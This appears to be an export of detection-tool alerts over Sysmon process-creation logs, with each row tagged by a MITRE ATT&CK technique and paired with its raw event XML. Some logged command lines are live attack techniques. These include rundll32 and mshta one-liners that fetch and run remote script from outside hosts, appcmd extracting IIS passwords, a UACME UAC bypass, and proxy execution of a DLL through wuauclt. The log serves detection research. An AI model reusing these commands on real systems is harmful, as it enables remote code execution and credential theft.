<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:45.405337Z"">
</TimeCreated>
<EventRecordID>6175</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:45.383</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6D-5CEB-0000-0010332A0C00</Data>
<Data Name=""ProcessId"">3876</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T11:23:18.824713Z"">
</TimeCreated>
<EventRecordID>5410</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 11:23:17.702</Data>
<Data Name=""ProcessGuid"">747F3D96-6EA5-5D45-0000-00108FD3E100</Data>
<Data Name=""ProcessId"">7844</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-D4E9-5D45-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6EA5-5D45-0000-0010EED0E100</Data>
<Data Name=""ParentProcessId"">4768</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\WerFault.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564829508.675628,2019-08-03T14:51:48.675628+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe &quot;C:\Program Files\Windows Media Player\osk.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T10:51:48.431273Z"">
</TimeCreated>
<EventRecordID>5308</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 10:51:47.872</Data>
<Data Name=""ProcessGuid"">747F3D96-6743-5D45-0000-001068D7B500</Data>
<Data Name=""ProcessId"">6456</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\windows\system32\cmd.exe &quot;C:\Program Files\Windows Media Player\osk.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020FBD31800</Data>
<Data Name=""LogonId"">0x18d3fb</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6742-5D45-0000-00104A66B500</Data>
<Data Name=""ParentProcessId"">6380</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Desktop\UACME.exe</Data>
<Data Name=""ParentCommandLine"">UACME.exe 32</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602619902.279861,2020-10-14T00:11:42.279861+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-13T20:11:42.278672Z"">
</TimeCreated>
<EventRecordID>2196442</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5340"" ThreadID=""7092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-13 20:11:42.277</Data>
<Data Name=""ProcessGuid"">00247C92-09FE-5F86-0000-0010AC861401</Data>
<Data Name=""ProcessId"">6372</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">c:\windows\system32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">c:\Windows\System32\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-DE70-5F85-0000-002059F80600</Data>
<Data Name=""LogonId"">0x6f859</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00247C92-09FE-5F86-0000-001051841401</Data>
<Data Name=""ParentProcessId"">1716</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wuauclt.exe</Data>
<Data Name=""ParentCommandLine"">wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer </Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558452777.286254,2019-05-21T19:32:57.286254+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true); )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.286254Z"">
</TimeCreated>
<EventRecordID>4125</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.276</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001054E32101</Data>
<Data Name=""ProcessId"">1532</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-4F8A-5CE3-0000-0010C5BB4800</Data>
<Data Name=""ParentProcessId"">3548</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;cmd.exe&quot; /s /k pushd &quot;C:\Users\IEUser\Desktop&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1611667274.296774,2021-01-26T17:21:14.296774+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( &quot;C:\windows\system32\cmd.exe&quot; /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-01-26T13:21:13.978709Z"">
</TimeCreated>
<EventRecordID>2429137</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5272"" ThreadID=""6060"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-01-26 13:21:13.976</Data>
<Data Name=""ProcessGuid"">00247C92-1749-6010-0000-0010EFAAD92E</Data>
<Data Name=""ProcessId"">23168</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.1316 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\windows\system32\cmd.exe&quot; /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd</Data>
<Data Name=""CurrentDirectory"">C:\Users\bouss\source\repos\blabla\blabla\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-5082-600D-0000-0020A246F726</Data>
<Data Name=""LogonId"">0x26f746a2</Data>
<Data Name=""TerminalSessionId"">5</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=DE550F262D31FF81730867A7E294795D085F503B,MD5=E567B7F80B21CC8905383BE1073F3707,SHA256=E5CC034E9062E1211FDDE5F85EBF2BD4E4EF63272BA23877C185C94FB503891E,IMPHASH=392B4D61B1D1DADC1F06444DF258188A</Data>
<Data Name=""ParentProcessGuid"">00247C92-1749-6010-0000-0010348FD92E</Data>
<Data Name=""ParentProcessId"">2988</Data>
<Data Name=""ParentImage"">C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe</Data>
<Data Name=""ParentCommandLine"">C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.124804,2019-05-27T05:29:20.124804+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:20.124804Z"">
</TimeCreated>
<EventRecordID>5979</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:20.084</Data>
<Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-0010F2DEFF00</Data>
<Data Name=""ProcessId"">2772</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557621160.342246,2019-05-12T04:32:40.342246+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T00:32:35.352012Z"">
</TimeCreated>
<EventRecordID>16248</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1996"" ThreadID=""1832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 00:32:35.289</Data>
<Data Name=""ProcessGuid"">365ABB72-69A3-5CD7-0000-00109D7F2200</Data>
<Data Name=""ProcessId"">1860</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-DC77-5CD7-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-69A3-5CD7-0000-001064792200</Data>
<Data Name=""ParentProcessId"">3432</Data>
<Data Name=""ParentImage"">C:\Windows\System32\taskeng.exe</Data>
<Data Name=""ParentCommandLine"">taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435998.310206,2019-07-30T01:33:18.310206+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close(); ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:18.286776Z"">
</TimeCreated>
<EventRecordID>4902</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:18.241</Data>
<Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-0010A3148700</Data>
<Data Name=""ProcessId"">776</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969965.405337,2019-05-27T19:12:45.405337+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:44.055762Z"">
</TimeCreated>
<EventRecordID>6173</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:44.023</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6C-5CEB-0000-0010050C0C00</Data>
<Data Name=""ProcessId"">3520</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE6B-5CEB-0000-00102A090C00</Data>
<Data Name=""ParentProcessId"">1536</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
